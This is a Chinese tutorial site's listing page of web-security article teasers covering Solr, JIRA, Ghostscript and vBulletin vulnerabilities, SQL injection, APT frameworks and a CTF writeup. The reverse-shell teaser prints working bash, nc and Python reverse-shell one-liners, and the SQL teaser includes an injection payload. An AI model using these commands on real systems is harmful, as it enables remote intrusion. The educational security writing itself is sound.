第 33 页-web服务器安全_网站安全防护教程-PHP中文网

Article Tags

安全

首页

Technical articles

运维

安全

Apache Solr velocity模板注入RCE漏洞的示例分析

0x01简介Solr是一个独立的企业级搜索应用服务器，它对外提供类似于Web-service的API接口。用户可以通过http请求，向搜索引擎服务器提交一定格式的XML文件，生成索引；也可以通过HttpGet操作提出查找请求，并得到XML格式的返回结果。0x02漏洞介绍Solr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令执行漏洞，攻击者利用该

May 19, 2023 am 10:37 AM

Solr Velocity

利用JIRA漏洞访问美军非保密因特网协议路由器网的示例分析

下面讲述了作者在参与美国国防部（DoD）HackthePentagon漏洞众测项目中，利用JIRA漏洞CVE-2017-9506构造了SSRF攻击面，实现了对美军非保密因特网协议路由器网（NIPRnet）的访问，并且结合其它漏洞技巧，获取到DoD内网系统的一系列敏感信息。由于测试过程和内容的涉密性，该篇文章仅点到为止，未对过多技术细节和详细场景作出披露，仅当学习分享，还望读者多多包涵。JIRA是澳大利亚Atlassian公司开发的一款优秀的问题跟踪管理软件工具，可以对各种类型的问题进行跟踪管理，

May 18, 2023 pm 10:29 PM

jira

SQL注入类型有哪些

前言SQL注入的攻击方式根据应用程序处理数据库返回内容的不同，可以分为可显注入、报错注入和盲注。可显注入攻击者可以直接在当前界面内容中获取想要获得的内容。报错注入数据库查询返回结果并没有在页面中显示，但是应用程序将数据库报错信息打印到了页面中，所以攻击者可以构造数据库报错语句，从报错信息中获取想要获得的内容。盲注数据库查询结果无法从直观页面中获取，攻击者通过使用数据库逻辑或使数据库库执行延时等方法获取想要获得的内容。Mysql手工注入lian合注入?id=1'orderby4--

May 18, 2023 pm 10:05 PM

SQL

反弹shell有哪些

1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

May 18, 2023 pm 10:01 PM

shell

NSA新型APT框架DarkPulsar怎么用

前言2017年3月，ShadowBrokers放出了一份震惊世界的机密文档，其中包括两个框架：DanderSpritz和FuzzBunch。DanderSpritz完全由插件组成，用于收集情报、利用漏洞和操控已接管的设备。它基于Java编写，提供类似于僵尸网络管理面板的图形界面以及类似Metasploit工具的控制面板。它还整合了用于非FuzzBunch受控设备的后门和插件。DanderSprit界面概述Fuzzbunch为不同的实用程序提供了一个用于交互和协同工作的框架，包含各种类型的插件，其

May 18, 2023 pm 08:14 PM

nsaDarkPulsar

如何进行Ghostscript SAFER沙箱绕过漏洞的分析

前言Ghostscript是一款AdobePostScript语言的解释器软件。可对PostScript语言进行绘图，支持PS与PDF互相转换。目前大多数Linux发行版中都默认安装，并移植到了Unix、MacOS、Windows等平台，且Ghostscript还被ImagineMagic、PythonPIL和各种PDF阅读器等程序所使用。漏洞描述8月21日，Google安全研究员TavisOrmandy披露了多个GhostScript的漏洞，通过在图片中构造恶意PostScript脚本，可以绕

May 18, 2023 pm 07:10 PM

ghostscriptSAFER

DDCTF2019两个逆向分别是什么

01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的，直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

May 18, 2023 pm 05:13 PM

DDCTFwriteup

绕过限制访问到Google内部管理系统的示例分析

蛛丝马迹某天，在挖掘谷歌漏洞的过程中，我从公开的漏洞中发现了一些谷歌自身服务的IP地址，一开始，我真不知道这些IP地址能干嘛。我就先检查了一遍这些IP地址，进一步发现其中包含了一些谷歌的内部IP。我突然想起来，最近，我的朋友KLSREERAM上报过一个谷歌内部IP相关的漏洞，另一个朋友Vishnu则上报过了一个利用谷歌子域名访问到控制面板的漏洞。目前，这两个漏洞都已被谷歌修复，这两个漏洞相关的内部IP地址也不能从互联网上访问到。但是，现在，在我面前就有几个谷歌内部IP地址，我得想办法来看看能不能

May 18, 2023 pm 03:19 PM

Google

如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

一、漏洞简介DiskPulseEneterprise是一款监视磁盘变化的软件，它可以通过一个管理端口9120或者web管理窗口80对软件进行连接管理，从而监视磁盘的变化情况。在DiskPulseEneterprise中有一个动态链接库libspp.dll，其中有一些负责HTTP操作的函数，问题就出现在这个动态链接库中，在处理后数据时，由于对于后数据没有进行严格的长度控制，导致在执行获取后数据时向无效内存拷贝数据造成缓冲区溢出，触发SEH异常行为处理，最后控制EIP，执行任意代码。软件下载链接：h

May 18, 2023 pm 03:04 PM

windowDisk Pulse Eneterprise

APP崩溃的主要原因是什么

一、什么样的场景下容易出现崩溃类问题最近脑子里一直在想什么样的问题容易导致崩溃——那就是具有异常思维，举个例子：正好前两天看了一部美剧叫《菜鸟老警》，里面有个场景是主人公JohnNolan因为没有用警车拦住逃犯的车而导致逃犯出逃，这个场景与测试有什么关联呢？首先正常人在马路上行驶都会躲避避免与别人发生碰撞，这就好比测试功能的主流程，不会去乱点乱输入；但是警察就不一样了，他会为了抓住逃犯不顾一切，想尽一切办法，这就好比测试过程中的异常思维，要思考怎么样操作使功能不好用。宝典一、异常操作各种异常操作

May 18, 2023 pm 01:55 PM

App

MySQL数据库常用技巧有哪些

1、如何选择服务器的类型？MySQL服务器配置窗口中各个参数的含义如下。【ServerConfigurationType】该选项用于设置服务器的类型。单击该选项右侧的向下按钮，即可看到包括3个选项。3个选项的具体含义如下：DevelopmentMachine(开发机器)：该选项代表典型个人用桌面工作站。假定机器上运行着多个桌面应用程序。将MySQL服务器配置成使用最少的系统资源。ServerMachine(服务器)：该选项代表服务器，MySQL服务器可以同其它应用程序一起运行，例如FTP、ema

May 18, 2023 pm 01:29 PM

MySQL

SolarWinds供应链APT攻击事件安全风险的示例分析

背景12月13日，美国顶级安全公司FireEye（中文名：火眼）发布报告称，其发现一起全球性入侵活动，命名该组织为UNC2452。该APT组织通过入侵SolarWinds公司，在SolarWindsOrion商业软件更新包中植入恶意代码，进行分发，FireEye称之为SUNBURST恶意软件。该后门包含传输文件、执行文件、分析系统、重启机器和禁用系统服务的能力，从而到达横向移动和数据盗窃的目的。SolarWindsOrionPlatform是一个强大、可扩展的基础架构监视和管理平台，它用于以单个

May 18, 2023 pm 12:52 PM

aptsolarwinds

vBulletin 5.x 远程代码执行漏洞的示例分析

vBulletin组件介绍vBulletin是论坛和社区发布软件的全球领导者。其安全性，强大的管理功能和速度，可为40,000多个在线社区提供服务等特点备受客户青睐。很多大型论坛都选择vBulletin作为自己的社区。从vBulletin官方网站所展示的客户列表可以得知，著名的游戏制作公司EA、著名的游戏平台Steam、日本大型跨国企业Sony、以及美国NASA等均为其客户，vBulletin高效，稳定，安全，在中国也有很多大型客户，比如蜂鸟网，51团购，海洋部落等在线上万人的论坛都用vBull

May 18, 2023 am 11:46 AM

vBulletin

Google在主动攻击下修复Chrome 0-day漏洞的示例分析

Google25日发布Chrome更新，修复三个安全漏洞，包括一个正遭到主动利用的0-day漏洞。关于这些攻击的详情以及该漏洞是如何被用于攻击Chrome用户的，尚未公开。这些攻击是在2月18日被Google的威胁分析小组成员ClementLecigne发现的。Google威胁分析小组是Google调查和追踪威胁行为体群体的部门。Chrome80.0.3987.122版本修复了该0-day漏洞。Windows，Mac和Linux用户都有可用的更新，但是ChromeOS，iOS和Android用户

May 18, 2023 am 11:25 AM

GoogleChrome 0-day